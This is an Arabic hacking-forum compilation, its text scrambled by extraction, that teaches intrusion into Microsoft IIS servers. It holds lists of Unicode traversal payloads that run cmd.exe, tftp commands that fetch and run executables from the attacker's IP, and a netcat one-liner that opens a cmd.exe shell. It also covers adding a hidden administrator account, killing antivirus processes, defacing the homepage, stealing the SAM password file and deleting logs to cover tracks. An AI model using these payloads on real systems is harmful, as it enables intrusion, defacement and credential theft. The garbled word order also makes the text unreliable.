في nix* انظمة مختلف Microsot اما محاولة فالوضع فإن صالحيات على التي Administrator الحصول ليسبالسهولة
مايكروسوفت تتوقعها انظمة في محلي بشكل االمتيازات فرفع وانا .. الواحده اليد اصابع عددها يتعدى ال قليلة بطرق فقط ممكن
السيرفر على السيطرة احكام كيفية الشرح الموضوع هذا اكتبللمدير مكافيء حساب على موارد والحصول بجميع والتمتع
.. النظام
المطلوبة + : الملفاتSechole.exe وملحقاتها .
Kill.exe Tlist.exe
ncx99.exe tftpd32.exe
العده جهز .. هنا واحد مجلد في جمعتها الوقت لتوفير
اداة كل عمل سأشرح : االن
1 - Sechole بشكل االمتيازات لرفع موجود استثمار اقوى وهو ) نواة .. ) في صدع على يعتمد بأنه مبسط بشكل عمله وطريقة محلي
لمدير .. تابعه عملية اغتصاب خالله من يستطيع تي ان ويندوزامتيازاتك برفع خاللها من يقوم النظام .
2 - Tlist .. والفائده بالخلفيه تعمل التي العمليات بعرضجميع تقومفايروس + االنتي الفايروول اقفال هو منها
3- Kill.exe رقم باقفال ستقوم حيث السابقة لالداة متمم عملهاالسابقة االداة من المستخرج . العملية
3- NCX99 الباكدوور من مطورة المنفذ NC نسخه على 99ينصت 4- TFTP32.exe السيرفر الى الملفات .. لنقل
مقدمه عن عبارة كان سبق ما االن كل سيبدأ الحقيقي العمل اما :
السيرفر الى السابق االدوات جميع برفع قم .. اوالبتشغيل قم مثال ncx99.exe ثم الشكل : بهذا
http://target/scripts/..À¯../...c+C:\ncx99.exe البورت على بالموقع باالتصال قم ذلك 99بعد ..
اوامر سطر على امتيازات CMD ستحصل . Guest = بدوناالداة بتشغيل قم التي .. TLIST االن العمليات جميع ستعرضلكالعملية .. رقم عن بالبحث قم فايروسان PID تعمل باالنتي الخاص
ناري .. جدار وجدت اذا وكذلك .. وجدرقم ورقه PID سجل على فايروسوالفايروول باالنتي الخاص
.. جانبيهباالداة االجراء بقتل قم الشكل Kill االن مكان .. KILL.exe PID : بهذا
PID العملية رقم تضع أن ! .. االجابة فايروس؟ االنتي اقفال من مالهدف البعض يسألمع تتعامل فايروس انتي من االخيرة انه Sechole التحديثات على
بتشغيل .. .. قم بنجاح السابقة العمليات اتمام بعد واالن باكدورSechole.exe المتصفح . من
امتيازات رفم سيتم مجموعه IWAM_USER عندها الىAdministrators ..
مشاكل اي وبدون الحريه بكامل االوامر جميع تنفيذه بإمكانك االنالصالحيات . Access Denided في
االيكو بامر الرئيسية الصفحه على الكتابة شي اهم : وطبعاC+Echo+Hacked+by+XDeMoNX+
< +C;\inetpub\wwwroot\index.htm
كلشي ليسهذا .. ولكنالرئيسية الصفحه تغيير عن فقط يبحثون ال االذكياء القراصنه
على يحتوي او مهم الموقع كان اذا خصوصاإلخ ... بيانات قواعد او معلومات
؟ : اليوزر بهذا الدخول تستطيع هل اي IWAM_USER سؤال الى؟؟ بي تي اف او تلنت مثل خدمه
كلمه : .. نملك ال لكننا امتيزاته برفع قمنا اننا صحيح ال االجابةعشوائي ! بشكل مسنده تكون النه . المرور
وكسره السام ملف على الحصول الى البعض تفكير هذا سيذهب اسهل .. ماهو يوجد لكن . ممكن
لـ مكافي حساب لدينا اننا كلمة Administrator بما نملك ال ولكننامع . بك خاصه باسورد مع باسمك جديد يوزر بإضافه رأيك ما المرور
ايضا !! المدير والتفكير امتيازات الذكاء من قليل التالي السطر واضف جديد نصي مستند بانشاء : قم
net user Demon pass /add && net localgroup administrators Demon /add واالن Save as باسم . add.bat واحفظها
يوزر : بانشاء يقوم دفعاتي مجلد انشاء هو سابقا فعلناه ما توضيحمرور Demon جديد مجموعة Pass وكلمة الى واضافته
المدراء االدمنستريتورز ..الملف برفع االن بواسطة ) add.bat قم المتصفح من تشغيلها ثم
اليونكود(مدير حساب لديك تي .. االن اف خدمه اي الى الدخول وتستطيع
غيرها بيوساو نت او تلنت او بي بك الخاصة الخلية االبواب واضافة االثار مسح النهاية في تنسى ال
القادمه المرات في الدخول لتسهيل )! واحد ) وكل طريقة شيخ لكل النه الجانب هذا في اتوسع لن طبعا
الملفات في والتحكم ادواته اخفاء في اسلوب . له
سابقة لنقطة .. نرجع؟ لماذا ؟؟ الفايروول اقفال منك طلبت اني تذكر هل
االمر تنفذ جربت سي .. netstat -an لو االن اوامر سطر خالل من
القلب يسر ما المنافذ من ستجد فانك نار 90% بجدران محمية وكانت دخلتها اللي السيرفرات من
المنفذ حمايه 139وجدت بدون مفتوحا فيها السقاط خيار من اكثر لك يجعل قد الفايرول اقفال فان لذا
الهدف
كالم .. أي الـ والتنسيق االمالء النحو على واختصار اسف ايضا . المعلومات
على .. الحصول درجة الى بكثير ذلك من اكثر االستعراض باالمكانرسومي . GUI تحكم
فسأكتب .. فراغ وقت وجدت اذا الكافي الوقت لدي يكون لم لكنمثل اخرى وادوات اخرى طرق وكيفية Sechole2 و GEtAdmin عن
االداة بواسطه رسومي تحكم على .. WINvnc الحصول
،،،انتهى
اليونيكود " ثغرات من االستفادة كيفية عن عامة " معلومات
>منقول<> هنتر: بالك >الكاتب
مع اليونيكود عبر السيرفر في التحكم اساليب عن يتكلم الموضوعالمتطلبات بعض
المطلوبه : االدوات
يونيكود )1 ثغرات مسح اداةسيرفر )2 TFTPD برنامجباليونيكود )3 جيده معرفة
==================================================================================================
او )1 المواقع من العديد من اليونيكود ثغرات على الحصول بأمكانكموقعي من
http://www.devil2k.com/هنتر )) (( بالك انا مني مهداه وهذه
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/syste
m32/cmd.exe?/c+dir+c:\/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+
dir+c:\/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/syste
m32/cmd.exe?/c+dir+c:\/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/
cmd.exe?/c+dir+c:\/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system
32/cmd.exe?/c+dir+c:\/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%
%35%63../winnt/system32/cmd.exe?/c+dir+c:\/_vti_bin/..
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/
c+dir+c:\/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm
d.exe?/c+dir+c:\/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/
cmd.exe?/c+dir+c:\/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system
32/cmd.exe?/c+dir+c:\/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%
%35%63../winnt/system32/cmd.exe?/c+dir+c:\/_vti_bin/..
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%
35%63../winnt/system32/cmd.exe?/c+dir+c:\/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syst
em32/cmd.exe?/c+dir+c:\/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste
m32/cmd.exe?/c+dir+c:\/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/syst
em32/cmd.exe?/c+dir+c:\/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syst
em32/cmd.exe?/c+dir+c:\/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/s
ystem32/cmd.exe?/c+dir+c:\/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/
cmd.exe?/c+dir+c:\/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/
cmd.exe?/c+dir+c:\/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/
cmd.exe?/c+dir+c:\/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+
dir+c:\/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+di
r+c:\/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/s
ystem32/cmd.exe\?/c+dir+c:\/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syst
em32/cmd.exe?/c+dir+c:\/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/sy
stem32/cmd.exe?/c+dir+c:\/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/
system32/cmd.exe?/c+dir+c:\/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/sys
tem32/cmd.exe?/c+dir+c:\/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/sys
tem32/cmd.exe?/c+dir+c:\/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/
system32/cmd.exe?/c+dir+c:\
برنامج )2 على الحصول الموقع TFTPD بأمكانك منhttp://iisbughelp.4t.com/
تستطيع )3 كيف تعرف ان يكفي جدا بسيطه اليونيكود معرفةالملفات وعبر الهارديسكات عبر االنتقال
) المتصفح عبر ) تعمل
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\هارديسك بداخل ما C:\ لقرائه
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+D:\هارديسك بداخل ما D:\ لقرائه
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+E:\هارديسك بداخل ما E:\ لقرائه
مثال وهنا ثغرات من به ما لنرى الموقع على سكان بعمل نقوماليونيكود )) ثغرات اغلب المطلوب بالمجلد مبتدأه ثغرات على
المجلدات (( هذه من تنطلق
1( المجلد msadc مثال/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?
/c+dir+C:\المجلد )2 vti_bin_ مثال
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
سيرفرات المجلد )) (( IIS في يكون عادي بشكل تركيبها عندوهو معين اسم تحت للويب : الرئيسي
C:\Inetpub\wwwrootالمجلد في او
D:\Inetpub\wwwrootالمجلد في او
E:\Inetpub\wwwrootالهارديسك في يكون العاده انه C في على شرحي سأكمل ولذلك
هناكالسيرفر على التي المواقع جميع عادة المجلد هذا في ستجد
ولتكن ما يونيكود ثغرة وجدنا فلو/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?
/c+dir+c:\هكذا الثغره فسنكتب به ما لنرى الملف هذا الى الولوج : وأردنا
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot
باسمه موقع كل فستجدها مواقع عدة يحوي السيرفر كان ( اذاالـ مجلد بداخل مجلدات في السيرفر ) wwwroot ستجدها كان لو اما
عبارهالـ مجلد في الملفات كافة فستجد فقط واحد موقع wwwroot عن
نفسهوعليك االولى الرئيسيه الصفحة بتغيير الهاكر يقوم الظن اغلب في
اسم تحمل االولى الرئيسيه الصفحة ليسدائما انه تعلم انindex.htm
معظمها )) (( بعضها وهذه لها وأختصارات تسميات عدة هناكindex.htmindex.asp
default.htmdefault.aspmain.htmmain.asp
مجلدنا في للموقع الرئيسيه الصفحة ان وجدنا اننا االن لنفرضwwwroot هي index.htm يهمنا ما وهو بتغييرها فكيفسنقوم
عملية من تقريباهذه االختراق
الملفمن اسم بتغيير اوال اخر index.htm سنقوم اسم اي الىوليكن ببالك ss.htm يخطر
وسنقوم لديك المتصفح من اليونيكود ثغرة عبر االمر سنرسل طبعاالداله الداله c+dir بتغيير c+ren الى
نفساالوامر (( هي سوتضع التي االوامر ان تعرف ان عليكفي عارفا Command Prompt وفي Dos الموجوده تكون ان فعليك
استخدامه المراد االمر هو بماهكذا الثغره ستكتب : المهم
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.htm+ss.htm
من الصفحة اسم تغيير تم فقد ss.htm الى index.htm وهكذاسهل هو كم ؟ ارأيتم
A للموقع الرئيسيه الصفحة باغالق تكتفي لم المخترق ايها انك يبدوهو الموضوع وليكن اخر بموضوع صفحة تضع ان تريد فانت
Hacked!!!صفحة في ؟؟ index.htm فكيفسنرسلها
بمنفذ االتصال عبر وهي الطريقه هذه سأذكر ومنها طرق عدة هناكTFTP امامك الذي والموقع السيرفر وضع في انت فيه ستكون الذي
الكالينت وضع في
؟ هذا كيفسيتم
سيرفر نظام بتركيب قم المذكور ) TFTP اوال البرنامج جهازك علىاكثر اخر برنامج وهناك البرامج افضل من الموضوع اول في
يكفي ( هذا ولكن احترافافي الرئيسي السيرفر ضع لديك C:\ االن
وسمها وسريعه خفيفه صفحة بتصميم في index.htm قم وضعها\:C
من الجديد الملف للسيرفر نرسل ان نريد ملف C:\ االن الى لديناC:\inetpub\wwwroot
باألصح )) هو امر يوجد ميكروسوفت نظم ففي صعبا ليساالمر الاسم (( يحمل منفصال بسيط TFTP برنامجا كالينت عن عباره وهو
يستخدمالبعض )) TFTP بروتوكول يسميه جدا جدا بسيط بروتوكول وهو
والى (( من الملفات ارسال او بسحب يقوم التافه البروتوكولالجهاز
؟ ذلك لنا فكيف جهازنا من ملفا يسحب ان نريد نحنالتالي االمر توليفة لكتبنا اليونيكود غير في كنا لو : طبعا
tftp.exe -i XXX.XXX.XXX.XXX get index.htm C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX منه الملف سحب المراد السيرفر بي اي تعني((
المسمى الملف بطلب الكالينت يقوم االمر هذا توليفة فيindex.htm المجلد في جهازه في wwwroot ليضعه
عن العادي الوضع يختلفمن االوامر توليفة فشكل تنسى ال ولكناليونيكود وضع
؟ الحل هو فماالتي الثغره في لتضعه يونيكود الى االمر توليفة تحول ان هو الحل
لديككالتالي شكله سيصبح يونيكود الى االمر تحويل : بعد
tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroo t\index.htm
بالفعل العقبه تجاوزنا لقد ياللروعه
الـ سيرفر بتشغيل قم الـ TFTP االن ملف بتجهيز index.htm وقمهذه اليها المضاف اليونيكود ثغرة عبر الموقع مع باالتصال وقم
النحو هذا على النهايه في ليصبح : التوليفه/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\
wwwroo t\index.htm
عملية من وانتيهنا االنترنت الى الصفحة بتحميل قمنا وهكذاتقريبا )) (( االختراق
ملفات : بتحميل تقوم ان يمكنك على EXE ملحوظه وتشغيلها ايضامثال وهذا بنفساالسلوب : السيرفر
ملف تحميل نريد اننا وسميناه EXE لنفرض السيرفر علىhunter.exe ؟ ذلك لنا فكيف تشغيله ونريد
االتي : سنتبعبتحميل قمنا كما السيرفر على الملف بتحميل index.htm نقوم
في التوليفه C:\ ونضعه هذه عبر : للسيرفر/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.ex
e?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe
االمر هذا تنفيذ عبر الملفسنشغله تحميل يتم ان بعد
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exeاالمر هذا طريق عن او
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe
واحد عمل السيرفر في لدينا بقي االنتهاء على قاربنا وقد اآلناللوج ملفات مسح وهو اال هذا *.log فقط طريق عن ذلك وسيكون
: االمر/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?
/c+del+C:\*.log/s
المعلومات بعض فيها تخزين يتم الملفات من اخرى انواع هناكاالمتداد ذات الملفات مثل وهي ايضا مسحها tmp ويفضل
اليونيكود عبر مسحها امر : وهذا/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?
/c+del+C:\*.tmp/sفي عنك معلومات اي تبقى ال ان وهي مهمه ملحوظه ايضا
قم الحقيقيه ايميالتهم او اسمائهم البعضبذكر يفعل كما السيرفرعليك يدل شيء اي بمسح
المستوى )) (( هذا الى تصل ان حاول االختراق عملية على اوفايروس ارسال مثل اليها اتطرق لن واالفكار االشياء من عدد هناك
ملف على امر او في bat ما كبيره مشكله وضع من تتمكن حتىيعمل ال لكي السيرفر
تمرز ان او النظام ملفات جميع بمحو فايروسيقوم ترسل ان اوو بعد عن التحكم برامج طريق عن السيرفر في لديهم نفسك
جيد بشكل اخفائهاالكثير الملفات ذات المجلدات الكثير )) system32 مثل (( في والكثير
__________________________________________________ ______________________________
بعض : فهناك الحاالت كل في الثغره هذه تعمل لن ملحوظاتملف مسح طريق عن عليك الطريق بقطع يقومون tftp السيرفرات
سيرفراتهم منالمجلد (( في موجود ذلك عن المسؤول وبعض )) system32 الملف
ترقيعا )) ميكروسوفت اصدرت الترقيع بعملية قامت السيرفراتالثغره (( لهذه
الصادر الباكيج بمراقبة يقوم وول فاير واضع يكون قد وبعضهمالعمليات هذه لمثل اصطياد بعمل يقوم وقد والوارد
نظم في جدا القوي الحمايه برنامج بتركيب يقومون اال IIS واخرونشركة Secure IIS وهو Eeye من
قبل )) الموضوع هذا كتابة عند ولكن العقبات من العديد والعديديقارب (( ما كان اشهر اربعة فيها% 90حوالي التي السيرفرات من
IIS نظامألهمال )) (( او وقتها وجوده لعدم ترقيع وبدون الثغره هذه تحوي
.المدير17.
سيرفر ".18 إلختراق الكامل " IIS الدليل> الحزم شبكة منتديات من >منقول
> DEMON :الكاتب<--------- - : مقدمة
--------- سيرفرات انتشار مدى الجميع االكبر IIS يعلم النسبة تشكل حيث
االنترنت مواقع تشغيل في .. المستخدمةلذا .. السيرفرات لهذه االمنية الناحية ضعف مدى الجميع ويعلمعملها كيفية توضيح مع النوع هذا ثغرات اشهر بجمع القيام . قررت
--------- - : مالحظة
--------- سيرفرات على تعمل هنا الموجودة الطرق IIS5.0 و IIS4.0 معظم
البورت على تعتمد ((80وجميعها المتصفح )) خالل من يعني .
------------- - : المتطلبات
------------- 1- CGI-Scanner .. افضل أنا ( Whisker جيد هذا من تنزيله يمكنك
) www.wiretrip.net/rfp : الموقعالبيرل -2 ملفات لتشغيل بيرل الموقع ( اكتيف من تنزيله يمكنك
: http://www.activestate.com/ ( 3- ) او ) اباتشي نوع اي سيرفر .. IIS ويب
##################################################
#########################
########### #! Game Starts #
###########
---------------- IIS Hack.exe : -
---------------- شركة في االمن خبراء بتحميل eEye اكتشف لك تسمح امنية ثغرة
من ذكية المنفذ nc.exe نسخه على تنصت 80وجعلها .. اوامر سطر سيعطيك امتيازات cmde.exe وهذا . Administrator مع
انزال من IIS Hack.exe و NC.exe بامكانك
. /http://www.technotronic.com الموقعالثغرة تنفيذ قبل جهازك في سيرفر ويب تشغيل .. ويجب
اداة بنسخ سيرفر nc.exe قم للويب الرئيسي الدليل في وضعها( لديك اباتشي . wwwroot الدليل IIS وفي )Htdocs في
بتشغيل قم : IISHack.exe ثمc:\<iishack.exe http://www.target.com/ 80 your_IP/ncx.exe
بنجاح السابقة الخطوة اتمام : وبعدc:\<nc http://www.target.com/ امامك eGG SheLL وستجد
سيرفرات : على الثغرة هذه تعمل يتم )) IIS4.0 مالحظة لم اذا فقط)) الرقعه . تركيب
do you want me to explain what to do next, hey common you must be kidding ...hehe....
----------------- MDAC = RDS :-
----------------- ان ) ارى زلت ما لكني قليال قديمة ثغرة انها المواقع% 40اعتقد من
منها .. تعانيبشكل الهدف النظام على اوامرك بتشغيل الثغرة هذه لك تسمح
مستخدم .. بصفتك وامرك تشغيل سيتم اي SYSTEM محليكان .. ما اذا معرفة اردت اذا العموم على النظام مدير بصالحيات
ال ام الثغرة بهذه مصابا .. النظامالهدف بالنظام باالتصال اوال c:\<nc -nw -w : قم
2 http://www.host.com/ 80 االمر بارسال قم GET : ثم/msadc/msadcs.dll HTTP
الرد كان اذا )) application/x_varg : فإذا مصاب النظام ان يعني فهذاترقيعه (( يتم .. لم
الموقع هذا في العمل عليك تسهل بيرل سكربتات ايجاد بامكانك: www.wiretrip.net/rfp )) mdac.pl - msadc2.pl (( v
c:\< mdac.pl -h host.com Please type the NT commandline you want to run )cmd /c
assumed(:\n cmd /c
االمر تنفيذ اال عليك ما الرئيسية الصفحه تغيير اردت echo : إذاhacked by me hehe < C:\inetpub\wwwroot\index.htm
تحميل بامكاننا الموقع على السيطرة احكام أردنا Hacker's وإذاSwiss knife Army اقصد Nc.exe االمر هذا : بواسطة
%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
جيدا (( قراءته من لتتمكن اليمين الى اليسار من االمر بقراءة )) قمالمنفذ على الهدف بالنظام باالتصال قم سطر 80بعدها وستجد
امتيازات مع . Administrator اوامر
-------------------------------------- Codebrws.asp & Showcode.asp :-
-------------------------------------- ملفات قاريء عن عبارة مع ASP الملفان يأتي IIS يأتي ال ولكنه
تفعيله النظام مدير على يجب بل افتراضيا .. محمللك تسمح قهي كثيرا منها ستسفيد مفعلة الخدمة هذه كانت فإذا
ملف اي (( asp. بقراءة المصدر رؤية . ))اعنيالنظام )) كان اذا السام ملف على ستحصل االمر هذا باستخدام
: مصابا ((http://www.victim.com/msadc/samples...nt/repair/sam._
السام ملف على الحصول باستخدام .. Expand it & Crack it بعدلدي المفضلة ( LC3.0 االداة من اقل في كسرها ساعه 24سيتم ( .
-------------- Null.htw : -
------------ فقط .. سأكتفي لذا قليال معقد الثغرة هذه عمل كيفية شرح عملية
منها االستفادة .. بطريقةملف الي السورسكود برؤية لك تسمح .. ASP باختصار
الثغرة ?http://www.victim.com/null.htw : لتنفيذCiWe...HiliteType=full
بالصفحه الخاص السورسكود الرابط هذا سيعرضلكDefault.asp .
---------------------- webhits.dll & .htw : -
---------------------- الهدف النظام على اللنك بتجربة قم اوال
: http://www.victim.com/blabla.htw العبارة بهذه الرد كان format of the QUERY_STRING is : فإذا
invalid بنسبة مصاب الهدف النظام ان يعني 90فهذا % . الطريقة بهذه الثغرة تنفيذ جرب : اخيرا
http://www.victim.com/xxxxxxxxx/xxxx...ilitetype=full الـ تغيير الملحقات , XXXXX/XXXXX/XXXX/XXX.htw مع هذه باحد
احدها سيعمل : وبالتأكيدiissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw االداة بواسطه بكسره قم السام ملف على ستحصل وبالتالي
LC3 ..
------------------------------------------------ [ASP Alternate Data Streams [::$DATA :-
------------------------------------------------ العام منذ بدايتها كانت الثغرة بالتحديد .. 1998هذه مخصصة وهي
بعضسيرفرات IIS3.0 لسيرفرات على تعمل .. IIS4.0 واالنمالفائدة )) البعضيتساءل صفحه الي السورسكود عرض ومهمتها
تحتوي (( بعضالصفحات ان االجابة ؟؟ عرضسورسالصفحه من
مثل البيانات قواعد مرور كلمات مثل مهمة معلومات علىGlobal.asa
األمر هذا بواسطة المتصفح من الثغرة تنفيذ يمكنhttp://www.victim.com/default.asp::$DATA
------------------ ASP dot bug : -
------------------ ايضا تقوم حيث الثغرة هذه النصهي هذا في ثغرة اقدم ربما
في .. اكتشافها تم حيث صفحه بأي الخاص السورسكود بعرض1997العام ..
الشكل بهذا المتصفح من تنفيذها : ويتم.http://www.victim.com/sample.asp في الموجودة النقطة الحظ
السطر اخرسيرفرات على تعمل فقط . IIS3.0 وهي
------------------------------------ ISM.DLL Buffer Truncation : -
------------------------------------ السورسكود ورؤوية الملفات بسحب للمهاجم يسمح برمجي خطأ
.. ايضايطلب قمنا اننا بإيهامه السيرفر على التحايل هي الثغرة وفكرة
اخر .. ملف بطلب نقوم نحن الحقيقة وفي ما .. ملفهو الخطأ هذا عن المسؤوول بعدد ISM.dll الملف تحميله يتم حيث
المسافة )% الرموز من . Space (20كبيرالشكل بهذا الثغرة تنفيذ : يمكن
http://www.victim.com/global.asa%20)...>=230(global.asa.htr الـ بوضع=< 230مكان الشكل 230نقوم بهذا 20مسافة % ..
سيرفرات على يعمل الخطأ تجربتها .. IIS 4.0&5.0 هذا يمكن ال ولكنوتسجيل خروج بتسجيل قام اذا اال مره من اكثر السيرفر على
ايقاف , الى تؤدي السابقة الثغرة ان ذلك في السبب ويعود دخوليكون ISM.dll الملف ان الثغرة تطلب بينما الذاكرة في العمل عن
الملففي .. تحميل اعادة يجب لذا العمل قيد المذكور الملفالنظام .. مدير يقوم ان يجب اخر بمعنى اي اخرى مره الذاكرة
تشغيل اعادة بعمل . Logout & Login او Rebot الهدف
---------- +.htr :- ---------
بملفات الخاص السورس بعرض تقوم ايضا الثغرة . ASP هذهالشكل بهذا استخدامها : يمكن
http://www.victim.com/global.asa+.htr
------------- site.csc : - ------------
الـ عن مهمة معلومات معرفة من الثغرة هذه الخاص DNS تمكنكذلك في بما .. DSN, UID and PASS Database بالموقع
http://www.victim.com/adsamples/config/site.csc : الثغرةمعلومات .. على وسيحصل المذكور الملف بانزال المهاجم سيقوم
أيضا هامة و . قيمة19." الـ في وبعمق مفصلة "UniCodeدراسة
> إعصار منتدى من >منقول>Dark Devil :الكاتب<
بركاته و الله ورحمه عليكم :: السالمبخيرو تكونوا اتمنى ؟ كلكم اخباركم ايه شباب .ازيكم
رهيبه ظروف الله و لكن و عنكم انقطاعى و غيبتى على اعذرونىبروكن رأى على فاضى كالم شويه فى نرغى خلونا االن و
بعضمن جمعت بعدين و ادعبثشوى و االنترنت اتصفح كنتطبعا ) كود اليونى عن تتحدث هى و مختلفه ملفات من المعلومات
كود يونى ه ه ه ه ياه يقول و سيستعجل معظمكم االنفى .... ( كود اليونى ذكرت لقد اصبر اقوله انا لكن و الخ قديمهاالخ من مره و هنتر بالك الصديق عن مره مرات ثالث المنتديات
المره هذه لكن خلود ابو او ديمون الصديق عن مره هكسوالسابقه المرات االختالفعن تمام مختلفه ستكون Trust( صدقونى
Me (يعجبكم الدرسيمكن نقول خلونا و الخرابيط ها من دعونا االن ::و
:اوال====
كود؟ اليونى وجدت متىFound On 15 May 2001 BY NSFOCUS
هى بالثغره تتأثر التى :: السيستيمزAll running IIS 4 / IIS 5 web server
Windows 2kWindows 2k SP1 + SP2
